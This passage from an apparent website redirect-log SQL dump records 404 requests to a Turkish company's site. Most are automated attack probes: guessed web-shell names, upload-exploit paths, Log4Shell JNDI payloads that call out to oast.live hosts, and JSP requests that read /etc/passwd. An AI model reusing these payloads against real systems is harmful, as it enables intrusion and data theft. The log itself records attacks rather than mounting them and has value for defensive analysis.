00:00:00',301),(33791,'http://3s-technologies.com.tr/tr/wool.php.suspected',NULL,'http://3s-technologies.com.tr/wool.php.suspected','',1,0,'2023-12-01 03:08:26','0000-00-00 00:00:00',301),(33792,'http://3s-technologies.com.tr/tr/qvybdn.php',NULL,'http://3s-technologies.com.tr/qvybdn.php','',1,0,'2023-12-01 04:00:45','0000-00-00 00:00:00',301),(33793,'http://3s-technologies.com.tr/tr/wp-track.php',NULL,'http://3s-technologies.com.tr/wp-track.php','',1,0,'2023-12-01 04:01:57','0000-00-00 00:00:00',301),(33794,'http://3s-technologies.com.tr/tr/fun.php',NULL,'http://3s-technologies.com.tr/fun.php','',15,0,'2023-12-01 04:09:41','0000-00-00 00:00:00',301),(33795,'http://3s-technologies.com.tr/tr/wp-form-ajax.php',NULL,'http://3s-technologies.com.tr/wp-form-ajax.php','',1,0,'2023-12-01 04:37:14','0000-00-00 00:00:00',301),(33796,'http://3s-technologies.com.tr/tr/sl.php.suspected',NULL,'http://3s-technologies.com.tr/sl.php.suspected','',1,0,'2023-12-01 04:56:04','0000-00-00 00:00:00',301),(33797,'http://3s-technologies.com.tr/tr/rguoysdgefs.php',NULL,'http://3s-technologies.com.tr/rguoysdgefs.php','',1,0,'2023-12-01 05:47:55','0000-00-00 00:00:00',301),(33798,'http://3s-technologies.com.tr/tr/xroot.php',NULL,'http://3s-technologies.com.tr/xroot.php','',3,0,'2023-12-01 06:05:22','0000-00-00 00:00:00',301),(33799,'http://3s-technologies.com.tr/tr/images.php',NULL,'http://3s-technologies.com.tr/images.php','',33,0,'2023-12-01 06:21:55','0000-00-00 00:00:00',301),(33800,'http://3s-technologies.com.tr/tr/sw.php',NULL,'http://3s-technologies.com.tr/sw.php','',7,0,'2023-12-01 06:56:21','0000-00-00 00:00:00',301),(33801,'http://3s-technologies.com.tr/tr/chosen.php',NULL,'http://3s-technologies.com.tr/chosen.php','',593,0,'2023-12-01 06:57:55','0000-00-00 00:00:00',301),(33802,'http://3s-technologies.com.tr/tr/jxxso4.php',NULL,'http://3s-technologies.com.tr/jxxso4.php','',1,0,'2023-12-01 07:15:22','0000-00-00 00:00:00',301),(33803,'http://3s-technologies.com.tr/tr/windex.php',NULL,'http://3s-technologies.com.tr/windex.php','',3,0,'2023-12-01 07:32:01','0000-00-00 00:00:00',301),(33804,'http://3s-technologies.com.tr/tr/gpdhy.php',NULL,'http://3s-technologies.com.tr/gpdhy.php','',1,0,'2023-12-01 07:32:27','0000-00-00 00:00:00',301),(33805,'http://3s-technologies.com.tr/tr/class-wp-inc.php',NULL,'http://3s-technologies.com.tr/class-wp-inc.php','',1,0,'2023-12-01 07:36:24','0000-00-00 00:00:00',301),(33806,'http://3s-technologies.com.tr/tr/system_info.php.suspected',NULL,'http://3s-technologies.com.tr/system_info.php.suspected','',1,0,'2023-12-01 08:03:30','0000-00-00 00:00:00',301),(33807,'http://3s-technologies.com.tr/tr/wp-readme.php',NULL,'http://3s-technologies.com.tr/wp-readme.php','',1,0,'2023-12-01 08:18:49','0000-00-00 00:00:00',301),(33808,'http://3s-technologies.com.tr/tr/old.php',NULL,'http://3s-technologies.com.tr/old.php','',6,0,'2023-12-01 08:31:07','0000-00-00 00:00:00',301),(33809,'http://3s-technologies.com.tr/tr/wp-pref.php',NULL,'http://3s-technologies.com.tr/wp-pref.php','',2,0,'2023-12-01 08:32:38','0000-00-00 00:00:00',301),(33810,'http://3s-technologies.com.tr/tr/woh.php',NULL,'http://3s-technologies.com.tr/woh.php','',18,0,'2023-12-01 08:32:38','0000-00-00 00:00:00',301),(33811,'http://3s-technologies.com.tr/tr/az.php',NULL,'http://3s-technologies.com.tr/az.php','',59,0,'2023-12-01 08:52:54','0000-00-00 00:00:00',301),(33812,'http://3s-technologies.com.tr/tr/loveindex.php',NULL,'http://3s-technologies.com.tr/loveindex.php','',1,0,'2023-12-01 09:06:07','0000-00-00 00:00:00',301),(33813,'http://3s-technologies.com.tr/tr/sec.php.suspected',NULL,'http://3s-technologies.com.tr/sec.php.suspected','',1,0,'2023-12-01 09:41:07','0000-00-00 00:00:00',301),(33814,'http://3s-technologies.com.tr/tr/varb.php',NULL,'http://3s-technologies.com.tr/varb.php','',19,0,'2023-12-01 09:45:43','0000-00-00 00:00:00',301),(33815,'http://3s-technologies.com.tr/tr/wgegsegesgh.php',NULL,'http://3s-technologies.com.tr/wgegsegesgh.php','',2,0,'2023-12-01 09:46:15','0000-00-00 00:00:00',301),(33816,'http://3s-technologies.com.tr/tr/dlhqs.php',NULL,'http://3s-technologies.com.tr/dlhqs.php','',1,0,'2023-12-01 10:14:16','0000-00-00 00:00:00',301),(33817,'http://3s-technologies.com.tr/tr/wp-sgin.php',NULL,'http://3s-technologies.com.tr/wp-sgin.php','',1,0,'2023-12-01 11:14:08','0000-00-00 00:00:00',301),(33818,'http://3s-technologies.com.tr/tr/wp-back.php.suspected',NULL,'http://3s-technologies.com.tr/wp-back.php.suspected','',1,0,'2023-12-01 11:21:35','0000-00-00 00:00:00',301),(33819,'http://3s-technologies.com.tr/tr/kyvcn.php',NULL,'http://3s-technologies.com.tr/kyvcn.php','',1,0,'2023-12-01 11:39:56','0000-00-00 00:00:00',301),(33820,'http://3s-technologies.com.tr/tr/hcamiutchh.php',NULL,'http://3s-technologies.com.tr/hcamiutchh.php','',1,0,'2023-12-01 11:39:56','0000-00-00 00:00:00',301),(33821,'http://3s-technologies.com.tr/tr/kntlx.php',NULL,'http://3s-technologies.com.tr/kntlx.php','',1,0,'2023-12-01 11:57:00','0000-00-00 00:00:00',301),(33822,'http://3s-technologies.com.tr/tr/jp-min.php',NULL,'http://3s-technologies.com.tr/jp-min.php','',1,0,'2023-12-01 12:10:58','0000-00-00 00:00:00',301),(33823,'http://3s-technologies.com.tr/tr/199877.php',NULL,'http://3s-technologies.com.tr/199877.php','',2,0,'2023-12-01 12:53:17','0000-00-00 00:00:00',301),(33824,'http://3s-technologies.com.tr/tr/wp-forms-ajax.php',NULL,'http://3s-technologies.com.tr/wp-forms-ajax.php','',1,0,'2023-12-01 13:06:41','0000-00-00 00:00:00',301),(33825,'http://3s-technologies.com.tr/tr/load.php',NULL,'http://3s-technologies.com.tr/load.php','',68,0,'2023-12-01 13:39:21','0000-00-00 00:00:00',301),(33826,'http://3s-technologies.com.tr/tr/wp-aespa.php',NULL,'http://3s-technologies.com.tr/wp-aespa.php','',3,0,'2023-12-01 13:39:31','0000-00-00 00:00:00',301),(33827,'http://3s-technologies.com.tr/tr/ydttunxzek.php',NULL,'http://3s-technologies.com.tr/ydttunxzek.php','',1,0,'2023-12-01 14:19:44','0000-00-00 00:00:00',301),(33828,'http://3s-technologies.com.tr/tr/pebb7z.php',NULL,'http://3s-technologies.com.tr/pebb7z.php','',1,0,'2023-12-01 15:07:52','0000-00-00 00:00:00',301),(33829,'http://3s-technologies.com.tr/tr/515ed60ca3.php',NULL,'http://3s-technologies.com.tr/515ed60ca3.php','',2,0,'2023-12-01 15:28:13','0000-00-00 00:00:00',301),(33830,'http://3s-technologies.com.tr/tr/.licences.php',NULL,'http://3s-technologies.com.tr/.LICENCES.php','',1,0,'2023-12-01 15:32:32','0000-00-00 00:00:00',301),(33831,'http://3s-technologies.com.tr/tr/wp-menus.php',NULL,'http://3s-technologies.com.tr/wp-menus.php','',1,0,'2023-12-01 15:32:33','0000-00-00 00:00:00',301),(33832,'http://3s-technologies.com.tr/tr/shellen.php',NULL,'http://3s-technologies.com.tr/shellen.php','',1,0,'2023-12-01 17:00:34','0000-00-00 00:00:00',301),(33833,'http://3s-technologies.com.tr/tr/confix.php',NULL,'http://3s-technologies.com.tr/confix.php','',1,0,'2023-12-01 17:19:44','0000-00-00 00:00:00',301),(33834,'http://3s-technologies.com.tr/tr/tnvjpdsskr.php',NULL,'http://3s-technologies.com.tr/TnvJpDSSKr.php','',1,0,'2023-12-01 17:20:50','0000-00-00 00:00:00',301),(33835,'http://3s-technologies.com.tr/tr/paiiing.php',NULL,'http://3s-technologies.com.tr/paiiing.php','',1,0,'2023-12-01 17:53:34','0000-00-00 00:00:00',301),(33836,'http://3s-technologies.com.tr/tr/lcfpv0n.php',NULL,'http://3s-technologies.com.tr/lCFpv0N.php','',1,0,'2023-12-01 18:13:21','0000-00-00 00:00:00',301),(33837,'http://3s-technologies.com.tr/tr/marvins.php|root',NULL,'http://3s-technologies.com.tr/marvins.php|root','',2,0,'2023-12-01 18:28:16','0000-00-00 00:00:00',301),(33838,'http://3s-technologies.com.tr/tr/feed-system.php',NULL,'http://3s-technologies.com.tr/feed-system.php','',1,0,'2023-12-01 19:09:28','0000-00-00 00:00:00',301),(33839,'http://3s-technologies.com.tr/tr/a89.php',NULL,'http://3s-technologies.com.tr/A89.php','',2,0,'2023-12-01 20:31:56','0000-00-00 00:00:00',301),(33840,'http://3s-technologies.com.tr/tr/w3ll1975.php',NULL,'http://3s-technologies.com.tr/w3ll1975.php','',2,0,'2023-12-01 21:51:33','0000-00-00 00:00:00',301),(33841,'http://3s-technologies.com.tr/tr/profile.php',NULL,'http://3s-technologies.com.tr/profile.php','',21,0,'2023-12-01 21:52:23','0000-00-00 00:00:00',301),(33842,'http://3s-technologies.com.tr/tr/q3okr9.php',NULL,'http://3s-technologies.com.tr/q3okr9.php','',1,0,'2023-12-01 22:26:10','0000-00-00 00:00:00',301),(33843,'http://3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing/',NULL,'','',2,0,'2023-12-04 13:50:24','0000-00-00 00:00:00',301),(33844,'http://3s-technologies.com.tr/tr/wp-content/themes/intense/block-css.php?mode=upload',NULL,'','',3,0,'2023-12-04 16:18:44','0000-00-00 00:00:00',301),(33845,'http://3s-technologies.com.tr/tr/wp-includes/requests/text/admin.php',NULL,'','',101,0,'2023-12-04 16:18:51','0000-00-00 00:00:00',301),(33846,'http://3s-technologies.com.tr/tr/wood-processing-ahşap-işleme/',NULL,'','',3,0,'2023-12-04 17:52:37','0000-00-00 00:00:00',301),(33847,'https://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',4,0,'2023-12-04 18:29:18','0000-00-00 00:00:00',301),(33848,'http://3s-technologies.com.tr/tr/pcb-prototip-prototyping/',NULL,'','',3,0,'2023-12-04 22:53:17','0000-00-00 00:00:00',301),(33849,'http://3s-technologies.com.tr/tr/templates/beez5/sftp-config.json',NULL,'','',1,0,'2023-12-07 09:57:11','0000-00-00 00:00:00',301),(33850,'http://3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing/',NULL,'','',2,0,'2023-12-07 13:24:06','0000-00-00 00:00:00',301),(33851,'http://3s-technologies.com.tr/tr/wp-content/plugins/td-composer/license.txt',NULL,'','',5,0,'2023-12-10 11:31:38','0000-00-00 00:00:00',301),(33852,'https://3s-technologies.com.tr/tr/wp-content/plugins/td-composer/license.txt',NULL,'','',5,0,'2023-12-10 14:00:05','0000-00-00 00:00:00',301),(33853,'https://3s-technologies.com.tr/tr/wood-processing-ahşap-işleme/',NULL,'','',5,0,'2023-12-11 09:35:41','0000-00-00 00:00:00',301),(33854,'https://3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing/',NULL,'','',5,0,'2023-12-11 11:01:26','0000-00-00 00:00:00',301),(33855,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/',NULL,'','',5,0,'2023-12-11 11:25:55','0000-00-00 00:00:00',301),(33856,'http://3s-technologies.com.tr/tr/wp-content/plugins/backup-backup/admin/css/bmi-plugin.min.css',NULL,'','',3,0,'2023-12-14 21:03:53','0000-00-00 00:00:00',301),(33857,'https://3s-technologies.com.tr/tr/tmp/evil.php',NULL,'','',1,0,'2023-12-16 00:48:44','0000-00-00 00:00:00',301),(33858,'http://www.3s-technologies.com.tr/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'','',1,0,'2023-12-16 14:22:39','0000-00-00 00:00:00',301),(33859,'http://www.3s-technologies.com.tr/en/wp-content/plugins/backup-backup/includes/r3x.php',NULL,'www.google.com','',1,0,'2023-12-16 14:22:39','0000-00-00 00:00:00',301),(33860,'https://www.3s-technologies.com.tr/en/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',2,0,'2023-12-18 04:07:07','0000-00-00 00:00:00',301),(33861,'http://3s-technologies.com.tr/tr/wp-content/plugins/mw-wp-form/css/admin-common.css',NULL,'','',3,0,'2023-12-18 23:35:30','0000-00-00 00:00:00',301),(33862,'https://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',1,0,'2023-12-19 05:51:03','0000-00-00 00:00:00',301),(33863,'https://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/evil.php',NULL,'','',1,0,'2023-12-19 05:51:11','0000-00-00 00:00:00',301),(33864,'https://3s-technologies.com.tr/tr/images/stories/evil.php',NULL,'','',1,0,'2023-12-19 05:51:40','0000-00-00 00:00:00',301),(33865,'https://3s-technologies.com.tr/tr/images/evil.php',NULL,'','',1,0,'2023-12-19 05:51:51','0000-00-00 00:00:00',301),(33866,'https://3s-technologies.com.tr/tr/evil.php',NULL,'','',1,0,'2023-12-19 05:51:57','0000-00-00 00:00:00',301),(33867,'https://3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=evil.php',NULL,'','',1,0,'2023-12-19 05:52:37','0000-00-00 00:00:00',301),(33868,'http://www.3s-technologies.com.tr/tr/urunler/gf-12-hc-ht-detail',NULL,'','',1,0,'2023-12-19 22:37:49','0000-00-00 00:00:00',301),(33869,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/',NULL,'','',1,0,'2023-12-19 22:39:28','0000-00-00 00:00:00',301),(33870,'http://3s-technologies.com.tr/en/contacts+()',NULL,'http://3s-technologies.com.tr/en/contacts+%28%29','',1,0,'2023-12-23 12:45:23','0000-00-00 00:00:00',301),(33871,'https://3s-technologies.com.tr/en/sitemap/sitemap.xml',NULL,'','',1,0,'2023-12-23 22:57:22','0000-00-00 00:00:00',301),(33872,'https://3s-technologies.com.tr/en/category-sitemap.xml',NULL,'','',2,0,'2023-12-23 22:58:10','0000-00-00 00:00:00',301),(33873,'https://3s-technologies.com.tr/en/sitemap-index.xml',NULL,'','',2,0,'2023-12-23 22:58:28','0000-00-00 00:00:00',301),(33874,'https://3s-technologies.com.tr/en/sitemap.xml.gz',NULL,'','',2,0,'2023-12-23 22:59:17','0000-00-00 00:00:00',301),(33875,'https://3s-technologies.com.tr/en/sitemap.php',NULL,'','',2,0,'2023-12-23 22:59:20','0000-00-00 00:00:00',301),(33876,'https://3s-technologies.com.tr/en/sitemapindex.xml',NULL,'','',2,0,'2023-12-23 22:59:34','0000-00-00 00:00:00',301),(33877,'https://3s-technologies.com.tr/en/sitemap/index.xml',NULL,'','',2,0,'2023-12-23 22:59:47','0000-00-00 00:00:00',301),(33878,'https://3s-technologies.com.tr/en/tag-sitemap.xml',NULL,'','',2,0,'2023-12-23 22:59:53','0000-00-00 00:00:00',301),(33879,'https://3s-technologies.com.tr/en/sitemap1.xml',NULL,'','',2,0,'2023-12-23 23:02:30','0000-00-00 00:00:00',301),(33880,'https://3s-technologies.com.tr/en/sitemap.txt',NULL,'','',10,0,'2023-12-23 23:06:50','0000-00-00 00:00:00',301),(33881,'http://mail.3s-technologies.com.tr/en/wordpress/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2023-12-24 20:32:50','0000-00-00 00:00:00',301),(33882,'http://3s-technologies.com.tr/en/old/wp-admin/setup-config.php?step=1',NULL,'www.google.com','',5,0,'2023-12-27 16:49:48','0000-00-00 00:00:00',301),(33883,'http://3s-technologies.com.tr/en/backup/wp-admin/setup-config.php?step=1',NULL,'www.google.com','',2,0,'2023-12-27 16:49:51','0000-00-00 00:00:00',301),(33884,'http://3s-technologies.com.tr/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'','',4,0,'2023-12-28 23:03:42','0000-00-00 00:00:00',301),(33885,'https://3s-technologies.com.tr/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'','',2,0,'2023-12-28 23:03:43','0000-00-00 00:00:00',301),(33886,'http://3s-technologies.com.tr/tr//modules/explorerpro/form.php?do=edit',NULL,'','',1,0,'2023-12-30 00:34:23','0000-00-00 00:00:00',301),(33887,'http://3s-technologies.com.tr/tr/wp-content/plugins',NULL,'','',77,0,'2023-12-31 05:39:38','0000-00-00 00:00:00',301),(33888,'http://3s-technologies.com.tr/tr/wp-content/themes',NULL,'','',134,0,'2023-12-31 05:39:39','0000-00-00 00:00:00',301),(33889,'http://3s-technologies.com.tr/tr/alfa_data',NULL,'','',54,0,'2023-12-31 05:39:43','0000-00-00 00:00:00',301),(33890,'http://3s-technologies.com.tr/tr/assets',NULL,'','',64,0,'2023-12-31 05:39:53','0000-00-00 00:00:00',301),(33891,'http://3s-technologies.com.tr/tr/admin/editor',NULL,'','',26,0,'2023-12-31 05:39:59','0000-00-00 00:00:00',301),(33892,'http://3s-technologies.com.tr/tr/include',NULL,'','',23,0,'2023-12-31 05:40:00','0000-00-00 00:00:00',301),(33893,'http://3s-technologies.com.tr/tr/admin/images/slider',NULL,'','',22,0,'2023-12-31 05:40:01','0000-00-00 00:00:00',301),(33894,'http://3s-technologies.com.tr/tr/admin/uploads/images',NULL,'','',24,0,'2023-12-31 05:40:11','0000-00-00 00:00:00',301),(33895,'http://3s-technologies.com.tr/tr/site/wp-includes',NULL,'','',2,0,'2023-12-31 05:40:12','0000-00-00 00:00:00',301),(33896,'http://3s-technologies.com.tr/tr/wordpress/wp-includes',NULL,'','',2,0,'2023-12-31 05:40:19','0000-00-00 00:00:00',301),(33897,'http://www.3s-technologies.com.tr/tr/wp-json/acf/v3/options/a?id=wp_mail&field=smtp',NULL,'','',4,0,'2024-01-01 04:04:16','0000-00-00 00:00:00',301),(33898,'http://3s-technologies.com.tr/en/sample.php?pd=1&mapname=sample-x5.xml',NULL,'www.google.com','',2,0,'2024-01-05 19:37:47','0000-00-00 00:00:00',301),(33899,'https://3s-technologies.com.tr/en/general.php?pd=1&mapname=op.php',NULL,'www.google.com','',2,0,'2024-01-05 19:38:08','0000-00-00 00:00:00',301),(33900,'http://3s-technologies.com.tr/tr/smm.php',NULL,'http://3s-technologies.com.tr//smm.php','',2,0,'2024-01-07 23:29:57','0000-00-00 00:00:00',301),(33901,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/mar.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/apikey/mar.php','',2,0,'2024-01-07 23:30:26','0000-00-00 00:00:00',301),(33902,'http://3s-technologies.com.tr/tr/wp-admin/images/module.php',NULL,'http://3s-technologies.com.tr//wp-admin/images/module.php','',2,0,'2024-01-07 23:30:27','0000-00-00 00:00:00',301),(33903,'http://3s-technologies.com.tr/tr/admin/controller/extension/wpm.php',NULL,'http://3s-technologies.com.tr//admin/controller/extension/wpm.php','',1,0,'2024-01-07 23:30:29','0000-00-00 00:00:00',301),(33904,'http://3s-technologies.com.tr/tr/payout.php',NULL,'http://3s-technologies.com.tr//payout.php','',4,0,'2024-01-07 23:30:32','0000-00-00 00:00:00',301),(33905,'http://3s-technologies.com.tr/tr/pi.php',NULL,'http://3s-technologies.com.tr//pi.php','',53,0,'2024-01-07 23:30:34','0000-00-00 00:00:00',301),(33906,'http://3s-technologies.com.tr/tr/wp_info.php',NULL,'http://3s-technologies.com.tr//wp_info.php','',1,0,'2024-01-07 23:30:38','0000-00-00 00:00:00',301),(33907,'http://3s-technologies.com.tr/tr/wp-content/upload.php',NULL,'http://3s-technologies.com.tr//wp-content/upload.php','',2,0,'2024-01-07 23:30:40','0000-00-00 00:00:00',301),(33908,'http://3s-technologies.com.tr/tr/wp-content/plugins/masterx/wpx.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/masterx/wpx.php','',1,0,'2024-01-07 23:30:42','0000-00-00 00:00:00',301),(33909,'http://3s-technologies.com.tr/tr/wp-admin/includes/about.php',NULL,'http://3s-technologies.com.tr//wp-admin/includes/about.php','',156,0,'2024-01-07 23:30:44','0000-00-00 00:00:00',301),(33910,'http://3s-technologies.com.tr/tr/uploads/wp-blog.php',NULL,'http://3s-technologies.com.tr//uploads/wp-blog.php','',1,0,'2024-01-07 23:30:49','0000-00-00 00:00:00',301),(33911,'http://3s-technologies.com.tr/tr/sett.php',NULL,'http://3s-technologies.com.tr//sett.php','',1,0,'2024-01-07 23:31:01','0000-00-00 00:00:00',301),(33912,'http://3s-technologies.com.tr/tr/clen.php',NULL,'http://3s-technologies.com.tr//clen.php','',1,0,'2024-01-07 23:31:13','0000-00-00 00:00:00',301),(33913,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/404.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/twentytwenty/404.php','',75,0,'2024-01-07 23:31:18','0000-00-00 00:00:00',301),(33914,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/not_found.php',NULL,'http://3s-technologies.com.tr//admin/controller/extension/extension/Not_Found.php','',1,0,'2024-01-07 23:31:20','0000-00-00 00:00:00',301),(33915,'http://3s-technologies.com.tr/tr/makhdmax.php',NULL,'http://3s-technologies.com.tr//makhdmax.php','',2,0,'2024-01-07 23:31:21','0000-00-00 00:00:00',301),(33916,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/wp-blog.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/linkpreview/wp-blog.php','',1,0,'2024-01-07 23:31:26','0000-00-00 00:00:00',301),(33917,'http://3s-technologies.com.tr/tr/sites/default/files/holadr7_70778.php',NULL,'http://3s-technologies.com.tr//sites/default/files/HolaDR7_70778.php','',1,0,'2024-01-07 23:31:28','0000-00-00 00:00:00',301),(33918,'http://3s-technologies.com.tr/tr/wp-2020.php',NULL,'http://3s-technologies.com.tr//wp-2020.php','',3,0,'2024-01-07 23:31:32','0000-00-00 00:00:00',301),(33919,'http://3s-technologies.com.tr/tr/wp-l0gin.php',NULL,'http://3s-technologies.com.tr//wp-l0gin.php','',72,0,'2024-01-07 23:31:37','0000-00-00 00:00:00',301),(33920,'http://3s-technologies.com.tr/nova-elektronik.com.tr/joomla/index.php?option=com_user&task=register&lang=en',NULL,'http://3s-technologies.com.tr/nova-elektronik.com.tr/joomla/index.php?option=com_user&task=register&lang=en','',3,0,'2024-01-10 12:35:54','0000-00-00 00:00:00',301),(33921,'http://3s-technologies.com.tr/en/home/',NULL,'','',1,0,'2024-01-10 20:40:16','0000-00-00 00:00:00',301),(33922,'http://3s-technologies.com.tr/en/corisit/',NULL,'','',1,0,'2024-01-10 20:40:40','0000-00-00 00:00:00',301),(33923,'http://3s-technologies.com.tr/en/wp-admin/',NULL,'','',1,0,'2024-01-10 20:41:19','0000-00-00 00:00:00',301),(33924,'http://3s-technologies.com.tr/en/powered-by-enerkey/',NULL,'','',1,0,'2024-01-10 20:41:52','0000-00-00 00:00:00',301),(33925,'https://3s-technologies.com.tr/en/style.php?sig=rename',NULL,'www.google.com','',2,0,'2024-01-11 13:03:26','0000-00-00 00:00:00',301),(33926,'https://3s-technologies.com.tr/.antproxy.php',NULL,'','',1,0,'2024-01-11 20:04:45','0000-00-00 00:00:00',301),(33927,'https://3s-technologies.com.tr/jars/upload',NULL,'','',1,0,'2024-01-11 20:04:45','0000-00-00 00:00:00',301),(33928,'https://3s-technologies.com.tr/tr/webtools/control/main',NULL,'https://3s-technologies.com.tr/webtools/control/main','',1,0,'2024-01-11 20:04:45','0000-00-00 00:00:00',301),(33929,'https://3s-technologies.com.tr/solr/gettingstarted_shard1_replica_n1/config',NULL,'','',1,0,'2024-01-11 20:18:16','0000-00-00 00:00:00',301),(33930,'https://3s-technologies.com.tr/solr/gettingstarted_shard2_replica_n1/debug/dump?param=contentstreams',NULL,'','',1,0,'2024-01-11 20:18:16','0000-00-00 00:00:00',301),(33931,'https://3s-technologies.com.tr/tr/webui',NULL,'https://3s-technologies.com.tr/webui','',1,0,'2024-01-11 20:18:16','0000-00-00 00:00:00',301),(33932,'https://3s-technologies.com.tr/webui/logoutconfirm.html?logon_hash=1',NULL,'','',1,0,'2024-01-11 20:18:17','0000-00-00 00:00:00',301),(33933,'https://3s-technologies.com.tr/tr/solr/admin/collections?action=${jndi:ldap://${:-447}${:-624}}.${hostname}.uri.cmg4862hiqvvjoa28of0iq73k3roqd9f5.oast.live/}',NULL,'https://3s-technologies.com.tr/solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-447%7D%24%7B%3A-624}%7D.%24%7BhostName%7D.uri.cmg4862hiqvvjoa28of0iq73k3roqd9f5.oast.live%2F%7D','',1,0,'2024-01-11 20:53:24','0000-00-00 00:00:00',301),(33934,'https://3s-technologies.com.tr/tr/solr/admin/cores?action=${jndi:ldap://${:-447}${:-624}}.${hostname}.uri.cmg4862hiqvvjoa28of0hmsew41wgyd6c.oast.live/}',NULL,'https://3s-technologies.com.tr/solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-447%7D%24%7B%3A-624}%7D.%24%7BhostName%7D.uri.cmg4862hiqvvjoa28of0hmsew41wgyd6c.oast.live%2F%7D','',1,0,'2024-01-11 20:53:25','0000-00-00 00:00:00',301),(33935,'https://3s-technologies.com.tr/en/jexws/jexws.jsp?ppp=cat+/etc/passwd',NULL,'https://3s-technologies.com.tr/jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd','',1,0,'2024-01-11 22:07:12','0000-00-00 00:00:00',301),(33936,'https://3s-technologies.com.tr/en/jexws4/jexws4.jsp?ppp=cat+/etc/passwd',NULL,'https://3s-technologies.com.tr/jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd','',1,0,'2024-01-11 22:07:12','0000-00-00 00:00:00',301),(33937,'https://3s-technologies.com.tr/en/jexinv4/jexinv4.jsp?ppp=cat+/etc/passwd',NULL,'https://3s-technologies.com.tr/jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd','',1,0,'2024-01-11 22:07:13','0000-00-00 00:00:00',301),(33938,'https://3s-technologies.com.tr/en/jbossass/jbossass.jsp?ppp=cat+/etc/passwd',NULL,'https://3s-technologies.com.tr/jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd','',1,0,'2024-01-11 22:07:14','0000-00-00 00:00:00',301),(33939,'https://3s-technologies.com.tr/en/jexws/jexws.jsp?ppp=type+c:/windows/win.ini',NULL,'https://3s-technologies.com.tr/jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini','',1,0,'2024-01-11 22:07:14','0000-00-00 00:00:00',301),(33940,'https://3s-technologies.com.tr/en/jexws4/jexws4.jsp?ppp=type+c:/windows/win.ini',NULL,'https://3s-technologies.com.tr/jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini','',1,0,'2024-01-11 22:07:15','0000-00-00 00:00:00',301),(33941,'https://3s-technologies.com.tr/en/jexinv4/jexinv4.jsp?ppp=type+c:/windows/win.ini',NULL,'https://3s-technologies.com.tr/jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini','',1,0,'2024-01-11 22:07:15','0000-00-00 00:00:00',301),(33942,'https://3s-technologies.com.tr/en/jbossass/jbossass.jsp?ppp=type+c:/windows/win.ini',NULL,'https://3s-technologies.com.tr/jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini','',1,0,'2024-01-11 22:07:16','0000-00-00 00:00:00',301),(33943,'http://3s-technologies.com.tr/tr/sample.php?pd=1&mapname=enigmacybersecurity-x5.xml',NULL,'','',1,0,'2024-01-12 18:15:04','0000-00-00 00:00:00',301),(33944,'http://3s-technologies.com.tr/tr/wp-content/themes/buddyboss-theme/style.css',NULL,'','',1,0,'2024-01-18 14:57:32','0000-00-00 00:00:00',301),(33945,'http://3s-technologies.com.tr/en/input.php',NULL,'www.google.com','',3,0,'2024-01-18 19:03:02','0000-00-00 00:00:00',301),(33946,'https://3s-technologies.com.tr/en/style.php',NULL,'www.google.com','',16,0,'2024-01-18 19:03:09','0000-00-00 00:00:00',301),(33947,'http://3s-technologies.com.tr/en/wzy.php?action=door123',NULL,'www.google.com','',4,0,'2024-01-18 19:03:29','0000-00-00 00:00:00',301),(33948,'https://3s-technologies.com.tr/en/wp-apxupx.php?apx=upx',NULL,'www.google.com','',1,0,'2024-01-18 19:03:41','0000-00-00 00:00:00',301),(33949,'http://3s-technologies.com.tr/en/wp-includes/css',NULL,'www.google.com','',35,0,'2024-01-19 04:59:56','0000-00-00 00:00:00',301),(33950,'http://3s-technologies.com.tr/en/wp-includes/id3',NULL,'www.google.com','',148,0,'2024-01-19 05:00:01','0000-00-00 00:00:00',301),(33951,'http://3s-technologies.com.tr/en/wp-includes/ixr',NULL,'www.google.com','',124,0,'2024-01-19 05:00:05','0000-00-00 00:00:00',301),(33952,'http://3s-technologies.com.tr/en/wp-includes/requests',NULL,'www.google.com','',47,0,'2024-01-19 05:00:11','0000-00-00 00:00:00',301),(33953,'http://3s-technologies.com.tr/en/wp-includes/simplepie',NULL,'www.google.com','',40,0,'2024-01-19 05:00:16','0000-00-00 00:00:00',301),(33954,'http://3s-technologies.com.tr/en/wp-includes/text',NULL,'www.google.com','',106,0,'2024-01-19 05:00:21','0000-00-00 00:00:00',301),(33955,'http://3s-technologies.com.tr/en/wp-content/mu-plugins-old',NULL,'www.google.com','',23,0,'2024-01-19 05:00:27','0000-00-00 00:00:00',301),(33956,'http://3s-technologies.com.tr/en/wp-content/themes/classic/inc',NULL,'www.google.com','',19,0,'2024-01-19 05:00:32','0000-00-00 